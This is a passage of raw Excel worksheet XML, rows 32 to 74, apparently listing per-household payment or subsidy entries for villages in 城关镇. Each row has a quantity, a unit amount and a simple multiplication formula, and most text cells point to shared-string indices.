      </c>
      <c r="I32" s="14">
        <f>H32*G32</f>
        <v>340</v>
      </c>
      <c r="J32" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K32" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="33" ht="23" customHeight="1" spans="1:11">
      <c r="A33" s="13" t="s">
        <v>317</v>
      </c>
      <c r="B33" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C33" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D33" s="14" t="s">
        <v>319</v>
      </c>
      <c r="E33" s="14" t="s">
        <v>320</v>
      </c>
      <c r="F33" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G33" s="14">
        <v>1</v>
      </c>
      <c r="H33" s="14">
        <v>340</v>
      </c>
      <c r="I33" s="14">
        <f>H33*G33</f>
        <v>340</v>
      </c>
      <c r="J33" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K33" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="34" ht="23" customHeight="1" spans="1:11">
      <c r="A34" s="13" t="s">
        <v>321</v>
      </c>
      <c r="B34" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C34" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D34" s="14" t="s">
        <v>322</v>
      </c>
      <c r="E34" s="14" t="s">
        <v>323</v>
      </c>
      <c r="F34" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G34" s="14">
        <v>2</v>
      </c>
      <c r="H34" s="14">
        <v>300</v>
      </c>
      <c r="I34" s="14">
        <f>H34*G34</f>
        <v>600</v>
      </c>
      <c r="J34" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K34" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="35" ht="23" customHeight="1" spans="1:11">
      <c r="A35" s="13" t="s">
        <v>324</v>
      </c>
      <c r="B35" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C35" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D35" s="13" t="s">
        <v>325</v>
      </c>
      <c r="E35" s="13" t="s">
        <v>326</v>
      </c>
      <c r="F35" s="14" t="str">
        <f>F34</f>
        <v>4113210106</v>
      </c>
      <c r="G35" s="14"/>
      <c r="H35" s="14"/>
      <c r="I35" s="14"/>
      <c r="J35" s="14"/>
      <c r="K35" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="36" ht="23" customHeight="1" spans="1:11">
      <c r="A36" s="13" t="s">
        <v>327</v>
      </c>
      <c r="B36" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C36" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D36" s="14" t="s">
        <v>328</v>
      </c>
      <c r="E36" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F36" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G36" s="14">
        <v>1</v>
      </c>
      <c r="H36" s="14">
        <v>340</v>
      </c>
      <c r="I36" s="14">
        <f>H36*G36</f>
        <v>340</v>
      </c>
      <c r="J36" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K36" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="37" ht="23" customHeight="1" spans="1:11">
      <c r="A37" s="13" t="s">
        <v>329</v>
      </c>
      <c r="B37" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C37" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D37" s="14" t="s">
        <v>330</v>
      </c>
      <c r="E37" s="14" t="s">
        <v>331</v>
      </c>
      <c r="F37" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G37" s="14">
        <v>2</v>
      </c>
      <c r="H37" s="14">
        <v>300</v>
      </c>
      <c r="I37" s="14">
        <f>H37*G37</f>
        <v>600</v>
      </c>
      <c r="J37" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K37" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="38" ht="23" customHeight="1" spans="1:11">
      <c r="A38" s="13" t="s">
        <v>332</v>
      </c>
      <c r="B38" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C38" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D38" s="13" t="s">
        <v>333</v>
      </c>
      <c r="E38" s="13" t="s">
        <v>334</v>
      </c>
      <c r="F38" s="14" t="str">
        <f>F37</f>
        <v>4113210106</v>
      </c>
      <c r="G38" s="14"/>
      <c r="H38" s="14"/>
      <c r="I38" s="14"/>
      <c r="J38" s="14"/>
      <c r="K38" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="39" ht="23" customHeight="1" spans="1:11">
      <c r="A39" s="13" t="s">
        <v>335</v>
      </c>
      <c r="B39" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C39" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D39" s="14" t="s">
        <v>336</v>
      </c>
      <c r="E39" s="14" t="s">
        <v>337</v>
      </c>
      <c r="F39" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G39" s="14">
        <v>3</v>
      </c>
      <c r="H39" s="14">
        <v>265</v>
      </c>
      <c r="I39" s="14">
        <f>H39*G39</f>
        <v>795</v>
      </c>
      <c r="J39" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K39" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="40" ht="23" customHeight="1" spans="1:11">
      <c r="A40" s="13" t="s">
        <v>338</v>
      </c>
      <c r="B40" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C40" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D40" s="13" t="s">
        <v>339</v>
      </c>
      <c r="E40" s="13" t="s">
        <v>340</v>
      </c>
      <c r="F40" s="14" t="str">
        <f>F39</f>
        <v>4113210103</v>
      </c>
      <c r="G40" s="14"/>
      <c r="H40" s="14"/>
      <c r="I40" s="14"/>
      <c r="J40" s="14"/>
      <c r="K40" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="41" ht="23" customHeight="1" spans="1:11">
      <c r="A41" s="13" t="s">
        <v>341</v>
      </c>
      <c r="B41" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C41" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D41" s="13" t="s">
        <v>342</v>
      </c>
      <c r="E41" s="13" t="s">
        <v>343</v>
      </c>
      <c r="F41" s="14" t="str">
        <f>F40</f>
        <v>4113210103</v>
      </c>
      <c r="G41" s="14"/>
      <c r="H41" s="14"/>
      <c r="I41" s="14"/>
      <c r="J41" s="14"/>
      <c r="K41" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="42" ht="23" customHeight="1" spans="1:11">
      <c r="A42" s="13" t="s">
        <v>344</v>
      </c>
      <c r="B42" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C42" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D42" s="14" t="s">
        <v>345</v>
      </c>
      <c r="E42" s="14" t="s">
        <v>346</v>
      </c>
      <c r="F42" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G42" s="14">
        <v>2</v>
      </c>
      <c r="H42" s="14">
        <v>300</v>
      </c>
      <c r="I42" s="14">
        <f>H42*G42</f>
        <v>600</v>
      </c>
      <c r="J42" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K42" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="43" ht="23" customHeight="1" spans="1:11">
      <c r="A43" s="13" t="s">
        <v>347</v>
      </c>
      <c r="B43" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C43" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D43" s="13" t="s">
        <v>348</v>
      </c>
      <c r="E43" s="13" t="s">
        <v>349</v>
      </c>
      <c r="F43" s="14" t="str">
        <f>F42</f>
        <v>4113210108</v>
      </c>
      <c r="G43" s="14"/>
      <c r="H43" s="14"/>
      <c r="I43" s="14"/>
      <c r="J43" s="14"/>
      <c r="K43" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="44" ht="23" customHeight="1" spans="1:11">
      <c r="A44" s="13" t="s">
        <v>350</v>
      </c>
      <c r="B44" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C44" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D44" s="14" t="s">
        <v>351</v>
      </c>
      <c r="E44" s="14" t="s">
        <v>323</v>
      </c>
      <c r="F44" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G44" s="14">
        <v>1</v>
      </c>
      <c r="H44" s="14">
        <v>340</v>
      </c>
      <c r="I44" s="14">
        <f>H44*G44</f>
        <v>340</v>
      </c>
      <c r="J44" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K44" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="45" ht="23" customHeight="1" spans="1:11">
      <c r="A45" s="13" t="s">
        <v>352</v>
      </c>
      <c r="B45" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C45" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D45" s="14" t="s">
        <v>353</v>
      </c>
      <c r="E45" s="14" t="s">
        <v>323</v>
      </c>
      <c r="F45" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G45" s="14">
        <v>1</v>
      </c>
      <c r="H45" s="14">
        <v>340</v>
      </c>
      <c r="I45" s="14">
        <f>H45*G45</f>
        <v>340</v>
      </c>
      <c r="J45" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K45" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="46" ht="23" customHeight="1" spans="1:11">
      <c r="A46" s="13" t="s">
        <v>354</v>
      </c>
      <c r="B46" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C46" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D46" s="14" t="s">
        <v>355</v>
      </c>
      <c r="E46" s="14" t="s">
        <v>239</v>
      </c>
      <c r="F46" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G46" s="14">
        <v>1</v>
      </c>
      <c r="H46" s="14">
        <v>340</v>
      </c>
      <c r="I46" s="14">
        <f>H46*G46</f>
        <v>340</v>
      </c>
      <c r="J46" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K46" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="47" ht="23" customHeight="1" spans="1:11">
      <c r="A47" s="13" t="s">
        <v>356</v>
      </c>
      <c r="B47" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C47" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D47" s="14" t="s">
        <v>357</v>
      </c>
      <c r="E47" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F47" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G47" s="14">
        <v>2</v>
      </c>
      <c r="H47" s="14">
        <v>300</v>
      </c>
      <c r="I47" s="14">
        <f>H47*G47</f>
        <v>600</v>
      </c>
      <c r="J47" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K47" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="48" ht="23" customHeight="1" spans="1:11">
      <c r="A48" s="13" t="s">
        <v>358</v>
      </c>
      <c r="B48" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C48" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D48" s="13" t="s">
        <v>359</v>
      </c>
      <c r="E48" s="13" t="s">
        <v>360</v>
      </c>
      <c r="F48" s="14" t="str">
        <f>F47</f>
        <v>4113210102</v>
      </c>
      <c r="G48" s="14"/>
      <c r="H48" s="14"/>
      <c r="I48" s="14"/>
      <c r="J48" s="14"/>
      <c r="K48" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="49" ht="23" customHeight="1" spans="1:11">
      <c r="A49" s="13" t="s">
        <v>361</v>
      </c>
      <c r="B49" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C49" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D49" s="14" t="s">
        <v>362</v>
      </c>
      <c r="E49" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F49" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G49" s="14">
        <v>2</v>
      </c>
      <c r="H49" s="14">
        <v>300</v>
      </c>
      <c r="I49" s="14">
        <f>H49*G49</f>
        <v>600</v>
      </c>
      <c r="J49" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K49" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="50" ht="23" customHeight="1" spans="1:11">
      <c r="A50" s="13" t="s">
        <v>363</v>
      </c>
      <c r="B50" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C50" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D50" s="13" t="s">
        <v>364</v>
      </c>
      <c r="E50" s="13" t="s">
        <v>236</v>
      </c>
      <c r="F50" s="14" t="str">
        <f>F49</f>
        <v>4113210106</v>
      </c>
      <c r="G50" s="14"/>
      <c r="H50" s="14"/>
      <c r="I50" s="14"/>
      <c r="J50" s="14"/>
      <c r="K50" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="51" ht="23" customHeight="1" spans="1:11">
      <c r="A51" s="13" t="s">
        <v>365</v>
      </c>
      <c r="B51" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C51" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D51" s="14" t="s">
        <v>366</v>
      </c>
      <c r="E51" s="14" t="s">
        <v>367</v>
      </c>
      <c r="F51" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G51" s="14">
        <v>1</v>
      </c>
      <c r="H51" s="14">
        <v>340</v>
      </c>
      <c r="I51" s="14">
        <f>H51*G51</f>
        <v>340</v>
      </c>
      <c r="J51" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K51" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="52" ht="23" customHeight="1" spans="1:11">
      <c r="A52" s="13" t="s">
        <v>368</v>
      </c>
      <c r="B52" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C52" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D52" s="14" t="s">
        <v>369</v>
      </c>
      <c r="E52" s="14" t="s">
        <v>370</v>
      </c>
      <c r="F52" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G52" s="14">
        <v>2</v>
      </c>
      <c r="H52" s="14">
        <v>300</v>
      </c>
      <c r="I52" s="14">
        <f>H52*G52</f>
        <v>600</v>
      </c>
      <c r="J52" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K52" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="53" ht="23" customHeight="1" spans="1:11">
      <c r="A53" s="13" t="s">
        <v>371</v>
      </c>
      <c r="B53" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C53" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D53" s="13" t="s">
        <v>372</v>
      </c>
      <c r="E53" s="13" t="s">
        <v>373</v>
      </c>
      <c r="F53" s="14" t="str">
        <f>F52</f>
        <v>4113210103</v>
      </c>
      <c r="G53" s="14"/>
      <c r="H53" s="14"/>
      <c r="I53" s="14"/>
      <c r="J53" s="14"/>
      <c r="K53" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="54" ht="23" customHeight="1" spans="1:11">
      <c r="A54" s="13" t="s">
        <v>374</v>
      </c>
      <c r="B54" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C54" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D54" s="14" t="s">
        <v>375</v>
      </c>
      <c r="E54" s="14" t="s">
        <v>312</v>
      </c>
      <c r="F54" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G54" s="14">
        <v>2</v>
      </c>
      <c r="H54" s="14">
        <v>300</v>
      </c>
      <c r="I54" s="14">
        <f>H54*G54</f>
        <v>600</v>
      </c>
      <c r="J54" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K54" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="55" ht="23" customHeight="1" spans="1:11">
      <c r="A55" s="13" t="s">
        <v>376</v>
      </c>
      <c r="B55" s="14" t="str">
        <f>B54</f>
        <v>城关镇</v>
      </c>
      <c r="C55" s="14" t="str">
        <f>C54</f>
        <v>西北村</v>
      </c>
      <c r="D55" s="13" t="s">
        <v>377</v>
      </c>
      <c r="E55" s="13" t="s">
        <v>288</v>
      </c>
      <c r="F55" s="14" t="str">
        <f>F54</f>
        <v>4113210106</v>
      </c>
      <c r="G55" s="14"/>
      <c r="H55" s="14"/>
      <c r="I55" s="14"/>
      <c r="J55" s="14"/>
      <c r="K55" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="56" ht="23" customHeight="1" spans="1:11">
      <c r="A56" s="13" t="s">
        <v>378</v>
      </c>
      <c r="B56" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C56" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D56" s="14" t="s">
        <v>379</v>
      </c>
      <c r="E56" s="14" t="s">
        <v>239</v>
      </c>
      <c r="F56" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G56" s="14">
        <v>2</v>
      </c>
      <c r="H56" s="14">
        <v>300</v>
      </c>
      <c r="I56" s="14">
        <f>H56*G56</f>
        <v>600</v>
      </c>
      <c r="J56" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K56" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="57" ht="23" customHeight="1" spans="1:11">
      <c r="A57" s="13" t="s">
        <v>380</v>
      </c>
      <c r="B57" s="14" t="str">
        <f>B56</f>
        <v>城关镇</v>
      </c>
      <c r="C57" s="14" t="str">
        <f>C56</f>
        <v>中华村</v>
      </c>
      <c r="D57" s="13" t="s">
        <v>381</v>
      </c>
      <c r="E57" s="13" t="s">
        <v>382</v>
      </c>
      <c r="F57" s="14" t="str">
        <f>F56</f>
        <v>4113210108</v>
      </c>
      <c r="G57" s="14"/>
      <c r="H57" s="14"/>
      <c r="I57" s="14"/>
      <c r="J57" s="14"/>
      <c r="K57" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="58" ht="23" customHeight="1" spans="1:11">
      <c r="A58" s="13" t="s">
        <v>383</v>
      </c>
      <c r="B58" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C58" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D58" s="14" t="s">
        <v>384</v>
      </c>
      <c r="E58" s="14" t="s">
        <v>385</v>
      </c>
      <c r="F58" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G58" s="14">
        <v>1</v>
      </c>
      <c r="H58" s="14">
        <v>340</v>
      </c>
      <c r="I58" s="14">
        <f>H58*G58</f>
        <v>340</v>
      </c>
      <c r="J58" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K58" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="59" ht="23" customHeight="1" spans="1:11">
      <c r="A59" s="13" t="s">
        <v>386</v>
      </c>
      <c r="B59" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C59" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D59" s="14" t="s">
        <v>387</v>
      </c>
      <c r="E59" s="14" t="s">
        <v>273</v>
      </c>
      <c r="F59" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G59" s="14">
        <v>1</v>
      </c>
      <c r="H59" s="14">
        <v>340</v>
      </c>
      <c r="I59" s="14">
        <f>H59*G59</f>
        <v>340</v>
      </c>
      <c r="J59" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K59" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="60" ht="23" customHeight="1" spans="1:11">
      <c r="A60" s="13" t="s">
        <v>388</v>
      </c>
      <c r="B60" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C60" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D60" s="14" t="s">
        <v>389</v>
      </c>
      <c r="E60" s="14" t="s">
        <v>331</v>
      </c>
      <c r="F60" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G60" s="14">
        <v>2</v>
      </c>
      <c r="H60" s="14">
        <v>300</v>
      </c>
      <c r="I60" s="14">
        <f>H60*G60</f>
        <v>600</v>
      </c>
      <c r="J60" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K60" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="61" ht="23" customHeight="1" spans="1:11">
      <c r="A61" s="13" t="s">
        <v>390</v>
      </c>
      <c r="B61" s="14" t="str">
        <f>B60</f>
        <v>城关镇</v>
      </c>
      <c r="C61" s="14" t="str">
        <f>C60</f>
        <v>西北村</v>
      </c>
      <c r="D61" s="13" t="s">
        <v>391</v>
      </c>
      <c r="E61" s="13" t="s">
        <v>392</v>
      </c>
      <c r="F61" s="14" t="str">
        <f>F60</f>
        <v>4113210106</v>
      </c>
      <c r="G61" s="14"/>
      <c r="H61" s="14"/>
      <c r="I61" s="14"/>
      <c r="J61" s="14"/>
      <c r="K61" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="62" ht="23" customHeight="1" spans="1:11">
      <c r="A62" s="13" t="s">
        <v>393</v>
      </c>
      <c r="B62" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C62" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D62" s="14" t="s">
        <v>394</v>
      </c>
      <c r="E62" s="14" t="s">
        <v>281</v>
      </c>
      <c r="F62" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G62" s="14">
        <v>2</v>
      </c>
      <c r="H62" s="14">
        <v>300</v>
      </c>
      <c r="I62" s="14">
        <f>H62*G62</f>
        <v>600</v>
      </c>
      <c r="J62" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K62" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="63" ht="23" customHeight="1" spans="1:11">
      <c r="A63" s="13" t="s">
        <v>395</v>
      </c>
      <c r="B63" s="14" t="str">
        <f>B62</f>
        <v>城关镇</v>
      </c>
      <c r="C63" s="14" t="str">
        <f>C62</f>
        <v>北外村</v>
      </c>
      <c r="D63" s="13" t="s">
        <v>396</v>
      </c>
      <c r="E63" s="13" t="s">
        <v>397</v>
      </c>
      <c r="F63" s="14" t="str">
        <f>F62</f>
        <v>4113210102</v>
      </c>
      <c r="G63" s="14"/>
      <c r="H63" s="14"/>
      <c r="I63" s="14"/>
      <c r="J63" s="14"/>
      <c r="K63" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="64" ht="23" customHeight="1" spans="1:11">
      <c r="A64" s="13" t="s">
        <v>398</v>
      </c>
      <c r="B64" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C64" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D64" s="14" t="s">
        <v>399</v>
      </c>
      <c r="E64" s="14" t="s">
        <v>400</v>
      </c>
      <c r="F64" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G64" s="14">
        <v>2</v>
      </c>
      <c r="H64" s="14">
        <v>300</v>
      </c>
      <c r="I64" s="14">
        <f>H64*G64</f>
        <v>600</v>
      </c>
      <c r="J64" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K64" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="65" ht="23" customHeight="1" spans="1:11">
      <c r="A65" s="13" t="s">
        <v>401</v>
      </c>
      <c r="B65" s="14" t="str">
        <f>B64</f>
        <v>城关镇</v>
      </c>
      <c r="C65" s="14" t="str">
        <f>C64</f>
        <v>东北六组</v>
      </c>
      <c r="D65" s="13" t="s">
        <v>402</v>
      </c>
      <c r="E65" s="13" t="s">
        <v>288</v>
      </c>
      <c r="F65" s="14" t="str">
        <f>F64</f>
        <v>4113210103</v>
      </c>
      <c r="G65" s="14"/>
      <c r="H65" s="14"/>
      <c r="I65" s="14"/>
      <c r="J65" s="14"/>
      <c r="K65" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="66" ht="23" customHeight="1" spans="1:11">
      <c r="A66" s="13" t="s">
        <v>403</v>
      </c>
      <c r="B66" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C66" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D66" s="14" t="s">
        <v>404</v>
      </c>
      <c r="E66" s="14" t="s">
        <v>405</v>
      </c>
      <c r="F66" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G66" s="14">
        <v>1</v>
      </c>
      <c r="H66" s="14">
        <v>340</v>
      </c>
      <c r="I66" s="14">
        <f>H66*G66</f>
        <v>340</v>
      </c>
      <c r="J66" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K66" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="67" ht="23" customHeight="1" spans="1:11">
      <c r="A67" s="13" t="s">
        <v>406</v>
      </c>
      <c r="B67" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C67" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D67" s="14" t="s">
        <v>407</v>
      </c>
      <c r="E67" s="14" t="s">
        <v>408</v>
      </c>
      <c r="F67" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G67" s="14">
        <v>2</v>
      </c>
      <c r="H67" s="14">
        <v>300</v>
      </c>
      <c r="I67" s="14">
        <f>H67*G67</f>
        <v>600</v>
      </c>
      <c r="J67" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K67" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="68" ht="23" customHeight="1" spans="1:11">
      <c r="A68" s="13" t="s">
        <v>409</v>
      </c>
      <c r="B68" s="14" t="str">
        <f>B67</f>
        <v>城关镇</v>
      </c>
      <c r="C68" s="14" t="str">
        <f>C67</f>
        <v>中华村</v>
      </c>
      <c r="D68" s="13" t="s">
        <v>410</v>
      </c>
      <c r="E68" s="13" t="s">
        <v>411</v>
      </c>
      <c r="F68" s="14" t="str">
        <f>F67</f>
        <v>4113210108</v>
      </c>
      <c r="G68" s="14"/>
      <c r="H68" s="14"/>
      <c r="I68" s="14"/>
      <c r="J68" s="14"/>
      <c r="K68" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="69" ht="23" customHeight="1" spans="1:11">
      <c r="A69" s="13" t="s">
        <v>412</v>
      </c>
      <c r="B69" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C69" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D69" s="14" t="s">
        <v>413</v>
      </c>
      <c r="E69" s="14" t="s">
        <v>414</v>
      </c>
      <c r="F69" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G69" s="14">
        <v>1</v>
      </c>
      <c r="H69" s="14">
        <v>340</v>
      </c>
      <c r="I69" s="14">
        <f>H69*G69</f>
        <v>340</v>
      </c>
      <c r="J69" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K69" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="70" ht="23" customHeight="1" spans="1:11">
      <c r="A70" s="13" t="s">
        <v>415</v>
      </c>
      <c r="B70" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C70" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D70" s="14" t="s">
        <v>416</v>
      </c>
      <c r="E70" s="14" t="s">
        <v>400</v>
      </c>
      <c r="F70" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G70" s="14">
        <v>2</v>
      </c>
      <c r="H70" s="14">
        <v>300</v>
      </c>
      <c r="I70" s="14">
        <f>H70*G70</f>
        <v>600</v>
      </c>
      <c r="J70" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K70" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="71" ht="23" customHeight="1" spans="1:11">
      <c r="A71" s="13" t="s">
        <v>417</v>
      </c>
      <c r="B71" s="14" t="str">
        <f>B70</f>
        <v>城关镇</v>
      </c>
      <c r="C71" s="14" t="str">
        <f>C70</f>
        <v>中华村</v>
      </c>
      <c r="D71" s="13" t="s">
        <v>418</v>
      </c>
      <c r="E71" s="13" t="s">
        <v>419</v>
      </c>
      <c r="F71" s="14" t="str">
        <f>F70</f>
        <v>4113210108</v>
      </c>
      <c r="G71" s="14"/>
      <c r="H71" s="14"/>
      <c r="I71" s="14"/>
      <c r="J71" s="14"/>
      <c r="K71" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="72" ht="23" customHeight="1" spans="1:11">
      <c r="A72" s="13" t="s">
        <v>420</v>
      </c>
      <c r="B72" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C72" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D72" s="14" t="s">
        <v>421</v>
      </c>
      <c r="E72" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F72" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G72" s="14">
        <v>1</v>
      </c>
      <c r="H72" s="14">
        <v>340</v>
      </c>
      <c r="I72" s="14">
        <f t="shared" ref="I72:I91" si="1">H72*G72</f>
        <v>340</v>
      </c>
      <c r="J72" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K72" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="73" ht="23" customHeight="1" spans="1:11">
      <c r="A73" s="13" t="s">
        <v>422</v>
      </c>
      <c r="B73" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C73" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D73" s="14" t="s">
        <v>423</v>
      </c>
      <c r="E73" s="14" t="s">
        <v>292</v>
      </c>
      <c r="F73" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G73" s="14">
        <v>1</v>
      </c>
      <c r="H73" s="14">
        <v>340</v>
      </c>
      <c r="I73" s="14">
        <f t="shared" si="1"/>
        <v>340</v>
      </c>
      <c r="J73" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K73" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="74" ht="23" customHeight="1" spans="1:11">
      <c r="A74" s="13" t="s">
        <v>424</v>
      </c>
      <c r="B74" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C74" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D74" s="14" t="s">
